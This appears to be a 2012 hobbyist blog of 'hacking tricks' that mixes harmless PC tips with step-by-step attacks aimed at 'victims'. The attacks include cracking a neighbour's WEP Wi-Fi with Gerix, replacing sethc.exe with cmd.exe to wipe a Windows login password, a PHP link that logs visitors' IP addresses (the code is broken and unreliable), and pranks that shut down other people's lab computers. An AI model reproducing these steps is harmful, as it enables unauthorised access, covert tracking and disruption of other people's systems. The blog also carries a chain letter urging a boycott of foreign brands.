Small INTERESTING tricks :)

Monday, 22 October 2012

Some INTERESTING trCicks  ::

HERES' THE SECRET

Want To Set Video As Wallpaper
For that u need a VLC media player
If you do not have => Click on me
1: install it.
2: Run VLC media player
3: Go to Settings->preferences->Interface->Main interfaces,den click on wxWidgets
4: Remove de tick from "Taskbar" n put a tick on "Systray icon".
5: then go to Video->Output Modules->DirectX...
6: On the bottom right put a tick on advanced options check box.now u will see some options....Put a tick on "Enable Wallpaper Mode "
7: Den select playlist n put a tick on "Repeat current item"
8: Click on Save button.
9: Restart ur player
10: Den play any video u wud like to set as Wallpaper
11: Right click on de video and click on "Wallpaper".The video wud be set as ur wallpaper!!!!
Thats it !!!

*******************
HACK WIFI WITH GUI software => Click on me :))
Put theme on ur facebook => Click on me :))
*******************************

XP hack
1)CLICK START
2)RUN
3) TYPE "control userpasswords2 " WITHOUT THE QUOTES
4) CLICK OK
5) A NEW WINDOW POPS OUT ;THERE CLICK ON "RESET PASSWORD"
6) GIVE U R CHOICE OF PASSWORD TWICE
THATS IT
THE HACK IS DONE
************
4 screen in windows => Click on me :))
Add ur image in mp3 file => Click on me :))
**********************

Precautions before you format a PC | A Brand New Setup…


So, Now you have made your mood to format your PC by yourself. It’s definitely a good thought but before you go for that there are some basic tips for which you should consider. Although installing windows is not a tough job as every thing is already explained while the Windows Setup Runs, Then is there any other steps that is required… of course Yes… detailed description provided below

1. Data Backup: This is the most important factor while you prepare to format your pc, If this is a new one then you can left this step for now but keep this in mind next time when you want to format this.What all you have to backup all the data files or the important one you have worked earlier, look after carefully each and every location where you may have saved them. The most probably folder includes Desktop and MY Document Folder, but you should look in other areas also from your C: Drive or where windows folder installed.

2. Device Drivers: As you know that every PC has a special set of devices like Display, Sound, Network, USB etc which required special drivers to work them perfectly. And each device is very likely will have different devices then any other configuration PC. So you required to have the drivers handy before you format any PC if you don’t have any CD with the drivers included then should look for it over Internet. Very Soon I will post an article “What to do if the Driver CD Missed” Subscribe to the Feed burner for daily Updates of the articles Published.

3. Software Packages: Again even if you have successfully formatted and installed the device driver Your computer won’t be operational until and unless you install in it some applicable software packages. The computer with the Operating System has the basic packages of software to run your computer. But those won’t be enough to help you carry out the basic works of typing. So you have to make sure that you have the soft copy of all the software installed.  Always remember that before you format or reinstall your windows or vista or any OS in your system, you need to get back up of the software packages or set-up of them in a Drive like D or E. The set up with the key numbers is very important that you must always make a back up of. Otherwise formatting the system will delete all the  software packages from your system. The back of the set-up of software packages enables you to re-install the packages for smooth running.

HACKING MOVIES to get urself boost up

Great Hacking MOVIES to get urself boost up ::

HERES' THE SECRET

Movies

1) Swordfish**

2) Sneakers

3) The Net

4) Tron

5) The Matrix (Trilogy)

6) War Games

7) Untraceable (2008)

8) The Core (2003) 10 minute

9) The Lawnmower Man (1992)

10) Deja Vu (2006)

11) GoldenEye (1995)

12) Pirates of Silicon Valley (1999)

13) Mission Impossible (1996)

14) Revolution OS (2001)

15) One Point O (2004)

16) Enemy of the State in 2001.

17) eXistenZ (1999)

18) Sneakers (1992)

19) The Girl with the Dragon Tattoo (2009)

20) Die hard 4

21) Code Hunter

22) Ghost in the Shell

23) Ghost in the Shell Stand Alone Complex

24) Hardwired

25) Nirvana

26) Pi

27) Serial Experiments: Lain

28) Sixteen Tongues

29) X-Files: Kill Switch (Episode 11, Season 5)

30) Breach

31) Firewall

32) Swordfish

33) Take down

34) Office Space

35) Pirates of Silicon Valley

36) Enemy of the State

37) Independence Day

38) Strange Days

39) Real Genius

40) Weird Science

41) Star Trek II: The Wrath of Khan

42) 2001: A Space Odyssey BONUS

43) Forty years of hackers at the movies
©Prasoon nigam

Wifi hacking with GERIX in BACKTRACK

Saturday, 11 August 2012

I showed you how to hack wifi with Terminal in BACKTRACK :: To know how to hack wifi with terminal in BACKTRACK => Click on me :))
Great response for this blog of mine :: Thanks to all my Readers

But many of my friends and readers said "its very difficult to learn all the commands and sometimes many problems comes and we go wrong with commands give us something that help us to hack wifi easily and in GUI version

So HERES' THE SECRET  to hack wifi with GERIX in BACKTRACK
GUI version of hacking WIFI
SO Guys here are the steps to do it
Open up ur BACKTACK
then Click on

Application => Backtrack => Exploitation tools => Wireless Exploitation =>WLAN Exploitation => gerix wifi cracker-ng

Click on Gerix wifi cracker

A window will open naming  Gerix wifi cracker
*******************
Backdoor help of Backtrack => Click on me :))
Put theme on ur Facebook => Click on me :))
recover jpeg files with Backtrack => Click on me :))
*************************************************
Now here are the Hacking Steps

Click on Configuration
            then there will be a interface name wlan0 (select it) and click on Enable/Disable Monitor mode
selecting Enable/Disable Monitor mode mon0 will be enabled, select it and then go to target network and in Channel select ALL and then click on Rescan networks

Basically i am telling you about how to hack WEP keys easily, after words how to hack WPA and WAP2 keys

ok after scanning all the networks you will find list of wifi with their names and ENCryption like WEP WPA and WPA2 :: select WEP encrypted wifi.

then look at above side you will find WEP written after Configuration :: Click on it

You will have some General Functionalities
In sub menu :: you will find FUNCTIONALITIES written :: in that there will be written
                        STart sniffing and LOgging :: click on it and a terminal will open with the BSSID of the wifi you selected before and channel name too

See downwords  it will showing WEP attacks (no-client) :: click on it
now go to FRagmentation attack

then just u have to click one by one ::  here do it like this

after opening options of fragmentation attack
             click on the fragmentattion attack the second option ::: terminal will open it will be asking you use this packets type "y" and press enter and look it will show u a file name with extension .xor file "now this is the file were wifi password is saved ::

after getting it click on CReate the ARP packet to be injected on the victim access point
     after that click on INject the created packet on victim acess point :: terminal will open it will be asking you use this packets type "y" and press enter
after pressing enter you will see you packets are being sent at very high speed :: wait till the packets reach too 25000 - 30000
after the packets have reached to this limit

look above there will written CRacking were configuration was written the third last option ::click on it
©Pprasoon Nigam
when u will click on it there will be a option naming "AIRcrack-ng - Decyrpt WEP Password"
Click on it and just relax back BACKTRACK WILL CRACK THE PASSWORD OF THE WIFI :))

Make Backdoor help of BACKTRACK Terminal

Thursday, 12 July 2012

In previous blog i showed you how to make backdoor when u have system on with u :: means to say that u have windows running in front of u and no logon password is there on the computer

Many of asked me what to do when u have access to the system but having password on the logon and u can't open it and how to make a backdoor in it ::

It was great question asked to me :: so as u know i am fond of learning backtrack i get to know that we can also make backdoor in system (having windows 7) help of the BACKTRACK

So HERES' THE SECRET 

how to make a backdoor when there is no logon password in it or u have accessed to the computer and can enter into the system 32 :: to know the steps => Click on me :))

And the second thing :: How to make a boot-able BACKTRACK pen-drive => Click on me :))

********************
How to recover JPEG file with Backtrack => Click on me :))
How to install SKYPE in Backtrack => Click on me :))
NMAP Tutorials =>Click on me :))
Download all Backtrack O.Ss => Click on me :))
********************************************************

So here are the steps to make a backdoor help of BACKTRACK TERMINAL

after making a bootable backtrack pen-drive :: insert the pendrive and set the boot priority to USB PORT or EXTERNAL HARDWARE

then ur backtrack will be running on the system ::

now open the terminal in the backtrack

and type in the following commands

* cd /media
** ls and press enter
*** then ur hard disk code will be shown (for ex: 28EC168........) something like this :: every hard-disk have their own code
NOTE:- when u could not the see the code repeat the step again or click on the "Places" (see in the backtrack above were there is terminal icon) then in places click one "filesystem" a window will open you will shown the hard-disk code as a title in blue :: the next step
**** (type) cd /media/(type the) hard-disk code and press enter
***** then type in ls and press enter
****** u will be seeing all the folders that are present in your C drive like Windows or Recovery etc etc
****** (then type) cd /media/(type the) hard-disk code/Windows and press enter
******* (then type) cd /media/(type the) hard-disk code/Windows/System32 and press enter
********  then u can type ls to see all the list of files & folders present in system32
********* then type in cp cmd.exe sethc.exe

     after changing sethc.exe to cmd.exe you can exit the terminal and reboot ur computer and and remove your pen-drive and
when logon screens comes asking for password
then just hit shift key 5 time and cmd.exe will open

and then type in command prompt

net user (name of your computer) *
   for example net user pprasoon * 

and then press enter two times :: it will be asking for new password u have leave it blank and then just relax and reboot your computer and yes its done no password is there on the victims computer

This is the Process to make BACKDOOR HELP BACKTRACK TERMINAL ON THE VICTIMS COMPUTER

*********************
Work on 4 Screens in Windows 7 => Click on me :))
Add ur Image on a MP3 file => Click on me :))
Convert ur image in ASCII code => Click on me :))
Learn About Virtual Machine and be Safe => Click on me :))
************************************************************

NOW HERE IS THE SECOND WAY TO MAKE BACKDOOR HELP OF BACKTERACK but not with the TERMINAL but help of OPENING THE DRIVE

HERES' THE SECRET

HOW TO DO IT

open ur backtrack help of pen-drive

* wait till backtrack desktop comes
** then click on places (above u will see)
*** then u will see ur deives
                  one will be system reserved (do not touch that drive)
                      next will the drive with name filesystem that will be C drive open it
**** you will see all the folder that present in C drive :: like Windows Users and many more
***** then open ur windows and then open system32
****** now search for the cmd.exe
                                                         and rename it sethc.exe
and replace with the original sethc,exe

volla you have done it :: and now just close all the windows and reboot the your system for windows removing pendrive

now when logon screens comes just press shift key 5 time your command prompt will open
now type in there

net user (name of your computer) *
   for example net user pprasoon *
and then press enter two times :: it will be asking for new password u have leave it blank and then just relax and reboot your computer and yes its done no password is there on the victims computer

©Pprasoon nigam
This is the Process to make BACKDOOR HELP BACKTRACK without TERMINAL ON THE VICTIMS COMPUTER

****************(~__^)********************
Hack Wifi with GUI version in BACKTRACK => Click on me :))

FACEBOOK THEME

Saturday, 23 June 2012

BORED of blue Facebook :: lets change into something new or lets change the theme of the Facebook

look out my profile




So you wana also change your PROFILE

HERES' THE SECRET

one disadvantage of changing facebook theme is :: the theme will only work on Mozilla Firefox browser

*********************
How to get someone's IP => Click on me :))
4 Screen in Windows => Click on me :))
Recover all you deleted jpeg files => Click on me :))
***************************************************

ok so here are the steps to do it

*) open ur browser Mozilla Firefox

**) open google or Click on me

***) then type in Google :: addons firfox or Click on me

***) then search in Greasemonkey or Click on me.. you will be redirected directly to the link
install it and restart your firefox

****) then again open addons and search for Stylish or Click on me.. you will be redirected directly to the link
install it by clicking on the Add to Firefox

and 90% of work is done ::

*.*) now at the end part ::  get the themes :: to get the themes => Click on me :))


open the above link click on any theme u like just install it and you are done

after installing restart your firefox and fast fast open your facebook ::: you are done with ur NEW THEME

**********************
Fun with Terminal in Backtrack => Click on me :))
Have fun in your computer LAB => Click on me :))
Hack wifi => Click on me :))
*******************************************
©Pprasoon nigam
don't forget to join me and make me see ur new theme
join me on Facebook  => click on me :))




How to get someone's Ip Address

Sunday, 3 June 2012

So many people asked how to get someone's ip address ::

So Heres' the SECRET  to get someone's ip address

**********
how to find stolen or lost android phones => Click on me :))
Metasploit Basics => Study about metasploit click on me :))
HOw to use Meterpreter => Meterpreter Basics click on me :)
*******************************
First Method
is help of cmd commad netstat

open ur cmd type in netstat help to get all the commands and to find ip use netstat -a

share as many things with victim like photos, song or any other type of file

when ur sharing then open cmd type in netstat -an and all the list will come and see the establishment and you will get the ip

Other netstat commands:

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.

************************
Get 4 screen in Windows O.S => Click on me :))
Have fun in Computer Lab => Click on me :))
Read about Man's life => click on me :))
***********************************************

Second method is the help of websites

I give you two websites that help ya find the ip address
here are the links

http://shivampatel.net/trace/

http://whatstheirip.com/

open these websites and read the instructions you will get to know how to do it

***************************
Be safe with notepad virus => click on me :))
Be safe with system hacking => click on me :))
Types of Virus => click on me :))
Be safe with Virus and Worms => click on me :))
Be safe with phishing attack => click on me :))
Be safe from being hacked => click on me :))
****************************************************************

Third method

Finding IP Addresses in Email Headers

ask the victim to send you an email when he sends you email so how to find the ip
Internet email headers contain several lines of text. Some lines start with the words Received: from. Following these words is an IP address, such as in the following fictitious example:
    Received: from nidhi.mit.edu (65.54.185.39)
    by mail1.aol.com with SMTP; 30 Jun 2003 02:27:02 -0000
These lines of text are automatically inserted by email servers that route the message. If only one "Received: from" line appears in the header, a person can be confident this is the actual IP address of the sender.

*************************
Calculate on command prompt => click on me :))
Learn Different types of error codes => Click on me :))
What  is Registry => Click on me :))
*****************************************

Fourth method is to find ip help of Backtrack

To find ip address use Nmap in Backtrack

Heres' the Tutorial of NMAP => Click on me :))

******************
Format drive with CMD => click on me :))
Mouse wheel trick => click on me :))
Reveal asterisk Password =>click on me :))
***********************************************

Fifth Method to find ip

This method is same as the second method but all the things done by website :: will be doing by own method
What we have do is
copy paste this code in a notepad or download it => click on me :)

""  <?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l ds \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
&data = $email.' '.' '.$pass.' '.' '.$ip.'

'.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://prasoon-

nigam.blogspot.in/');
?> ""

copy the above code in a notepad (without quotes) and save it as ip.php
now make a other notepad with name ip_log

in ip_log all the ip will be stored

now what u have to do is find a free webs hosting site and upload both the files ip.php and ip_log

i give u one http://x10hosting.com/


and link will be generated when u give this link to any victim his ip will be save in ip_log file as soon as it clicks on the link ::

©Pprasoon nigam

here is the video tutorial for fifth method => Click on me :)

**************** (~_^) *********************
Block your enemies sim card => click on me :))

4 working screen in Winodws like linux

Friday, 1 June 2012

Everyone knows that linux O.S (backtrack) gives you 4 screen to do different tasks in different screens

like wise today i will give u a software that will give 4 different screen on windows O.S to work different things

Heres' the SECRET

to download the software => Click on me :)

 the name of the software is Shock4Way3D

******************************
Recover JPEG files with help of Backtrack => Click on me :))
Learn about Virtual Machine => Click on me :))

What is Steganography => click on me :))

*************************************************


it basically a 3d effect software for computer and laptop screen but studying more about i got to know that it gives 4 screen to use and use different work simultaneously

here is the view



as u can see in the image u can see 4 desktop :: so use these desktop and work on them
to get the second desktop click on the blue icon (see in photo 2 downside) :: keep pressing the left button of the mouse and move the mouse left side + keep pressing the left button and then release it ::

or

*************************
Stages of Penetration => Click on me :))
Learn about BINDERS => Click on me :))
Most funny virus => Click on me :))
Java Scripts => Click on me :))
**************************************************

the second method is



as u seen in the above photo there is the icon use it :: second click on the blue icon near the time :: and read everything

©pprasoon nigam

so have fun with 4 screen as linux have and a 3d view too

*****************(~_^)**************
Hack wifi with GUI version in BACKTRACK => Click on me :))

Recover JPEG files with BACKTRACK

Thursday, 24 May 2012

How to recover ur memorable JPEG files with the help of Backtack 5 ?

Heres' the SECRET

in Backtrack 5 there is a software name revcoverjpeg which helps u to recover all ur jpeg file :) :))

*******************
Install skype on backtrack => Click on me :)
Advantages of Virtual Machine => Click on me :)
Binders => Click on me :)
********************************

now how it works

insert the backtrack 5 bootable usb

How to make bootable backtrack USB => Click on me_1 :)
                                                                          Click on me_2 :)

after opening the backtrack 5 with help or ur USB

open ur terminal/knosole in backtrack 5

now type in commands

cd Dsesktop

mkdir Pprasoon  (we are making a new folder on desktop)

then type cd Pprasoon

now type in fdisk -l (this will show u all ur hard drives with their space)

****************
Hide ur imp hard drives => Click on me :)
Send Email the date u want => Click on me :)
Lock ur fav folder => Click on me :)
***********************************

then type in the main command to get ur jpeg files

recoverjpeg /dev/sda1
(*sda1is the name or ur first harddrive, u can use sda2 for second, sda3 for third and as many as u want but one by one)

if the above command doesn't work then this means the software is not installed :: to install the software

type in aptget install revcoverjpeg and press enter and  then do all the above things

after doing all this work open ur folder made on desktop name Pprasoon and see all your photos

© Pprasoon Nigam

Do join with me on my FACEBOOK profile => Click on me :)

HELP INDIAN ECONOMY

Friday, 11 May 2012

EVERY TRUE INDIAN SHOULD SPEND 3min to read this?

Very very important Please forward to all Indians
Save the Indian Rupee!!!
YOU CAN MAKE A HUGE DIFFERENCE TO THE INDIAN ECONOMY BY FOLLOWING FEW SIMPLE RULES SET FOR YOURSELF:-
**Please spare a couple of minutes here for the sake of India...

**Here's a small example:-
Before 12 months 1 US $ = IND Rs 39
After 12 months, now 1 $ = IND Rs 53.619
Do you think US Economy is booming? No, but Indian Economy is Going Down.
Our economy is in your hands...

**A cold drink that costs only 70 / 80 paisa toproduce, is sold for Rs.9 and a major chunk of profits from these are sent abroad. This is a serious drain on INDIAN economy.

**What you can do about it?
1. Buy only products manufactured by WHOLLY INDIAN COMPANIES.
2. ENROLL as many people as possible for this cause.....
Each individual should become a leader for this awareness. This is the only way to save our country from severe economic crisis. You don't need to give-upyour lifestyle. You just need to choose an alternate product.
All categories of products are available from

**WHOLLY INDIAN COMPANIES.
LIST OF PRODUCTS
COLD DRINKS:-
DRINK LEMON JUICE, FRESH FRUITJUICES, CHILLED LASSI (SWEET OR SOUR), BUTTER MILK, COCONUT WATER, JAL JEERA, ENERJEE,and MASALA MILK...
INSTEAD OF COCA COLA, PEPSI, LIMCA, MIRINDA, SPRITE

BATHING SOAP:-
USE CINTHOL & OTHER GODREJ BRANDS, SANTOOR, WIPRO SHIKAKAI, MYSORE SANDAL, MARGO, NEEM, EVITA, MEDIMIX, GANGA , NIRMA BATH & CHANDRIKA
INSTEAD OF LUX, LIFEBUOY, REXONA, LIRIL, DOVE, PEARS, HAMAM, LESANCY, CAMAY, PALMOLIVE

TOOTH PASTE:-
USE NEEM, BABOOL, PROMISE, VICO VAJRADANTI, PRUDENT, DABUR PRODUCTS, MISWAK
INSTEAD OF COLGATE, CLOSE UP, PEPSODENT, CIBACA, FORHANS, MENTADENT.

TOOTH BRUSH: -
USE PRUDENT, AJANTA , PROMISE
INSTEAD OF COLGATE, CLOSE UP, PEPSODENT, FORHANS, ORAL-B

SHAVING CREAM:-
USE GODREJ, EMAMI
INSTEAD OF PALMOLIVE, OLD SPICE, GILLETE

BLADE:-
USE SUPERMAX, TOPAZ, LAZER, ASHOKA
INSTEAD OF SEVEN-O -CLOCK, 365, GILLETTE

TALCUM POWDER:-
USE SANTOOR, GOKUL, CINTHOL, WIPRO BABY POWDER, BOROPLUS
INSTEAD OF PONDS, OLD SPICE, JOHNSON'S BABY POWDER, SHOWER TO SHOWER

MILK POWDER:-
USE INDIANA, AMUL, AMULYA
INSTEAD OF ANIKSPRAY, MILKANA, EVERYDAY MILK, MILKMAID.

SHAMPOO:-
USE NIRMA, VELVETTE
INSTEAD OF HALO, ALL CLEAR, NYLE, SUNSILK, HEAD AND SHOULDERS, PANTENE

MOBILE CONNECTIONS:-
USE BSNL, AIRTEL
INSTEAD OF HUTCH

Food Items:-
Eat Tandoori chicken, Vada Pav, Idli, Dosa, Puri, Uppuma
INSTEAD OF KFC, MACDONALD'S, PIZZA HUT, A&W

Every INDIAN product you buy makes a bigdifference. It saves INDIA. Let us take a firm decision today.
BUY INDIAN TO BE INDIAN...

*****EVERY TRUE INDIAN WILL MUST DO THIS*****

Install SKYPE in backtrack 5

Thursday, 3 May 2012

Skype great software :: having great features

* free calls
** free videos calls
*** free both video call and call at same time

****************************
Add image in mp3 file => Click on me :)
Fun with Konsole / terminal in backtrack 5 => Click on me :)
**************************************************

Ok so today i am telling u up

HOW TO INSTALL SKYPE SOFTWARE IN BACKTRACK 5

HERES' THE SECRET

open up ur backtrack 5 and see it is connected to internet

now open up this site =>  http://www.skype.com/intl/en/get-skype/

then click on download and select ubuntu 32 bit and download it  and save it to desktop

now open your terminal / konsole in backtrack and type in

dpkg -i

then drag and drop the file (skype) u downloaded on desktop and hit enter :: and just then u r done

****************************
Hack wifi => Click on me :)
Nmap tutorials for backtrack => Click on me :)
************************************************

vollla its installed :: then go to the Applications then in sub menu go to internet and internet u will see skype is there :: :)

©Pprasoon nigam

Here is the video tutorial of the above => Click on me :)

Fun with Terminal/Konsole Backtrack 5

Tuesday, 1 May 2012

I know hacking is great fun but sometimes we want some fun rather then hacking
i mean to say to impress someone :: to show how we work with backtrack and to show backtrack is easy and i play with backtrack

**********************************
Crack hash with Backtrack 5 => Click on me :)

How to hack Wifi =>  Click on me :)
*******************************************


Now here is some fun with Backtrack Terminal / Konsole

HERES' THE SECRET


To see the Video tutorial => Click on me :)


what u gonna do is open ur terminal
and type in there

apt-get install cmatrix and hit enter

cmatrix will install
after cmatrix is installed

type in cmatrix and hit enter and matrix coding will start in terminal



Next u type in

apt-get install sl and hit enter

when sl is installed then type in sl -laf and hit enter
and see the magic a train will be moving

*************************************
Nmap tutorials backtrack 5 => Click one me :)

Safe your Wifi From being Hacked => Click on me :)

***************************************************

The third and the last one type in

apt-get install cowsay and hit enter

cowsay will be installed :: when cowsay is installed

type in  cowsay "hello"  and hit enter and see cow will say hello

Volla have fun with all these things and impress everyone

©Pprasoon nigam

Add ur image in a mp3 file

Monday, 30 April 2012

Amazing thing when a song played on ur cell phone and ur image is shown instead of movie poster ?


Many of u think what a big deal in this::

But i like and i share it with all my friends and readers of my blog ::

Like i feel i am ricky bahl :: so when ever song is played "aadat se majboor" in my phone i hate the poster of the film so i thought let it be me over there as the poster so worked on it how to change the poster of the film even its has the extension of .mp3 (voo great na)

Every one must be thinking what a big deal in this this can be done in windows movie maker or something like that software ::
But the big deal is how change the poster in song having the extension of .mp3 now this is a big deal


So to change the movie poster in any poster or ur photo poster ::

HERES' THE SECRET

what all u need is 2 software

1st software is format factory
to download the software => click on me :)

2nd software is mp3tag
to download the software => Click on me :)

Download songs from the websites u like

i give u some link   just click on them u will boom to the website

=> http://songspk.pk/
=>http://papa.pk/
=>www.hungama.com

after downloading song from these website or any website

then open the software format factory and convert the mp3 song in to mp3 :: ya u must be thinking WTF i am saying this but doing this u remove the poster of the film the song u have downloaded
ok after doing this open the software mp3tag


this the software view





now here are the steps how to do it ::

step* open the software

step** click on file and then click on change directory
          a new window will open now go the folder were u keep safe ur songs

step*** all the songs will be displayed and then select the song u want to add ur image

step**** now see the arrow in the figure were it is pointer to right or second click on it and there will be a option add cover and click on it and a window will open and select ur photo or image that u want to tag and volllaaaa u r done with it ::

step***** now open ur song and see ur image while playing ur fav. song...

©Pprasson nigam

For This Trick we humble thank to our first admin
NIDHI SRI

Cracking Hash BACKTRACK 5

Friday, 13 April 2012

HOW TO CRACK HASH OR MD5 HASH OR TO DECODE THESE HASH ?
HELP OF JOHN THE RIPER


HERES' THE SECRET


What all u need is Backtrack 5

TO Download backtrack 5 => Click on me

To make a bootable backtrack pendrive => Click on me

and how to hack someone WIFI =>Click on me


So after getting backtrack 5

Here are the steps how to do it

*Copy the md hash in to the gpedit (notepad in backtrack) and save any name u want i save as hash.txt

** Now copy and paste that file (hash.txt) in the root folder

*** Now open the terminal in the backtrack and type

    Here are the commands

            cd (space) /pentest/passswords/hash  press enter

then the second command is

             ./hash --format =raw-MD5 (space) /root/hash.txt    and press enter



Now here is a website for FREE which will help the decode hash file online

TO BOOM the website  => Click on me :)


© Pprasoon nigam

Convert ur image to ASCII with Backtrack

Saturday, 31 March 2012

We make many or search many sms or photos in ASCII

now it will be not a problem now u can make any image or even ur image in ASCII
How to do it

Heres' the SECRET


** Open ur backtrack 5

*** in that open terminal
*** and type in command

apt-get install jp2a   this command will install the software ::

then put any ur image or any image having extension jpg on the dekstop

then type the command

cd Desktop and hit enter

then type command

ls to check the list of all the image u have in ur desktop in backtrack 5 :)


then command to convert the image is

jp2a (name of the image with extension .jpg) and press enter

like for example

jp2a pprasoon.jpg and press enter ur done ::


heres' the video tutorial see and do it ::  Click on me


© pprasoon nigam

HAPPY HOLI

Wednesday, 7 March 2012


                          !!!! WISH U VERY VERY COLOR FULL HOLI !!!!




                                                              

Saade rang ko galti se aap naa kora samjho,
Isi mey samaaye indradhanushi saaton rang,
Jo dikhe aapko zindagi saadagi bhari kisi ki,
To aap yun samjho satrangi hai duniya usiki, 
Holi aayi satrangi rango ki bouchar laayi,
Dher saari mithai aur mitha mitha pyar laayi,
Aap ki zindagi ho mithe pyar aur khusiyon se bhari,
Jisme samaaye saaton rang yahi shubhkamna hai hamaari.



The First Person To Wish You “HAPPY HOLI”…
`
Rangon se bhi rangeen zindagi hai humari, rangeeli rahe yeh bandagi hai humari, kabhi na bigde ye pyar ki rangoli, aye mere yaar aisi HAPPY HOLI.
`
Fulo Ne Khilna Chhod Diya Taro Ne Chamkna Chhod Diya Holi Me Baki Hai 2 Din Fir Aapne Abhi Se Nahana Q Chhod Diya. Happy Holi
`
Holi Ke din ki ye mulakat yaad rahegi, rango ki ye barsaat yaad rahegi! Aap ko mile rangeen duniya aese hamesha, ye meri dua rahegi! Holi Mubarak…

********************************************************

Try some new HACKS and Interesting tricks


Download ANDROID Applications => Click on me :))

WIFI hacking GUI version => Click on me :))

VIRTUAL MACHINE

What is VIRTUAL MACHINE ?

HERES' THE SECRET

                A self-contained operating environment that behaves as if it is a separate computer. For example, Jave applets run in a Java virtual machine (VM) that has no access to the host Operating system. This design has two advantages:
  • System Independence: A Java application will run the same in any Java VM, regardless of the Hardware and Software underlying the system.
  • Security: Because the VM has no contact with the operating system, there is little possibility of a Java program damaging other files or applications.
The second advantage, however, has a downside. Because programs running in a VM are separate from the operating system, they cannot take advantage of special operating system features.


System virtual machines
  • multiple OS environments can co-exist on the same computer, in strong isolation from each other
  • the virtual machine can provide an instruction set architecture (ISA) that is somewhat different from that of the real machine
  • application provisioning, maintenance, high availability and disaster recover
The main disadvantages of VMs are:
  • a virtual machine is less efficient than a real machine when it accesses the hardware indirectly
  • when multiple VMs are concurrently running on the same physical host, each VM may exhibit a varying and unstable performance (Speed of Execution, and not results), which highly depends on the workload imposed on the system by other VMs, unless proper techniques are used for temporal isolation among virtual machines.
Multiple VMs each running their own operating system (called guest operating system) are frequently used in server consolidation, where different services that used to run on individual machines to avoid interference are instead run in separate VMs on the same physical machine.


Imp Note ::
                        If u have a windows 98 O.S running in your system :: just install virtual machine and you can run windows 7 and linux and evey O.S u want ::

Virtual machine is very helpful for the beginners who have started studying learning ethical hacking :::  make virus run on virtual machine this will not make any damage to your system

Virtual machine help to make work on any software :: it will help ya in everything you want ::

Download Virtual machine => Click one me



NMAP Tutorial (BACKTRACK)

Tuesday, 6 March 2012

What is NMAP ?

HERES' THE SECRET

Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, Nmap accounts for the network conditions during the run.
Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed

NMAP can determine the
                             operating system of the target,
                                       names and
                                              versions of the listening services,
                                                          estimated up time,
                                                                      type of device,
                                                                                and presence of a FIREWALL.

Nmap runs on
                       Linux,
                                Microsoft Windows,
                                                Solaris
                                                     ,HP-UX
                                                           and
                                                               BSD
 Linux is the most popular Nmap platform with Windows following it closely

****************************
Hack WIFI with the GUI version in BACKTRACK => Click on me :))
******************************************

Features of NMAP

Nmap features include:
  • Host Discovery – Identifying hosts on a network. For example, listing the hosts which respond to pings or have a particular port open.
  • Port Scanning – Enumerating the open ports on one or more target hosts.
  • Version Detection – Interrogating listening network services listening on remote devices to determine the application name and version number
  • OS Detection – Remotely determining the operating system and some hardware characteristics of network devices.
  • Scriptable interaction with the target – using Nmap Script Engine  [WIKIPEDIA HELP]
**********
Make BACKDOOR help of BACKTRACK TERMINAL => Click on me :))

*********************************
COMMANDS OF NMAP

Open ur konsole in backtrack and type all the commands and see their working and do connect to internet also :)

* type nmap and press enter :: to see all the commands of nmap

** Nnow how to scan ips in range and to see how many are alive :: command is
           nmap -sP 192.168.254.0/24
*** Now how to scan ip in a specific range :: command is
            nmap -sP 192.168.254.99-106
like we are scanning ip from 99 to 106

**** Now we will do stealth scan to see how many ports are open on the specific ip :: command is
            nmap -sS 192.168.254.102 and press enter
***** Now to find what operating system running on the ip address :: command is
             nmap -O 192.168.254.102

****** Now to scan for TCP connect :: command is
             nmap -sT 192.168.254.102

******* Just a null scan to check wether ip is alive or not :: command is
             nmap -sN 192.168.254.102

******** Now to scan for UDP connect :: command is
             nmap -sU 192.168.254.102

********** To scan for IP Protocol :: command is
            nmap -sO 192.168.254.102

*********** To check  ACKNOWLEGMENT (ACK) :: command is
            nmap -sA 192.168.254.102
************* To scan for which windows is running :: command is
            nmap -sW 192.168.254.102

© pprasoon nigam

HAPPY MAHASHIVRATRI OM NAMAH SHIVAY

Sunday, 19 February 2012




                                     
              :: OM NAMHSHIVAY ::


Wish u very happy mahashivratrti

from Pprasoon Nigam

SECRETS FINALLY REVEALED 



Computer Lab fun

Saturday, 11 February 2012

           ::Computer Lab Funs::

How to have some LOL funs in Computer Lab ?

Every one in college/schools/office have computer over there :: u can play pranks on ur friends and laugh out loudly

Now how to play tricks and pranks

Heres' the SECRET

There is a software name call ANGRY IP SCANNER

To download ANGRY IP SCANNER => Click on me :)

Now what to do

Sit down at the last computer in computer lab :: as we all know that all computers are connected to each other with the help of hub or LAN wire  ::
Now install angry ip scanner at the last computer u r sitting

Open ur cmd (command prompt) type ipconfig and get ur computer's ip so that u may not shutdown ur computer






Angry ip Scanner looks like this

When scanner is instal :: run the angry ip scanner u will get all the ips of the computer :: select all the ip (except the computer u r sitting) and give the command shutdown from the command option given in menu :: and vollaaaa all the computer vl shutdown :: and every one think y the computer turned off


SECOND PRANK


Make a shutdown bactch file command

Or download the shutdown batch file command => Click on me :)

After making or downloading the file :: put this file in the startup folder
navigate to startup folder => C:/programdata/microsoft/windows start menu/programs/startup

Now when ever someone open this computer this file will be activated and computer will shutdown ::

More Tricks On Computer Shutdown => Click on me :)


THIRD PRANK

Now open run window (window key + R )

Type this command

shutdown -s -t 15 -c "You are buffalo" Or what ever u want

this command is shutdown computer after 15 sec

and to shutdown computer at a particular time here is the command

at 11:45 AM or PM shutdown -s -t 00

now what this command does is this shutdown computer at particular time ::: so if someone is working on that computer and when this time comes the computer will shutdown and person will think for a while what had happen :: y the computer shutdown

To know more :: shutdown computer at particular time => Click one me :)

More Pranks => Cick on me :)
                           Click on me :))


©Pprasoon nigam

ALL BLUETOOTH & MOBILE HACKING SOFTS

Friday, 10 February 2012

             :: Bluetooth and mobile hacking software in one place ::


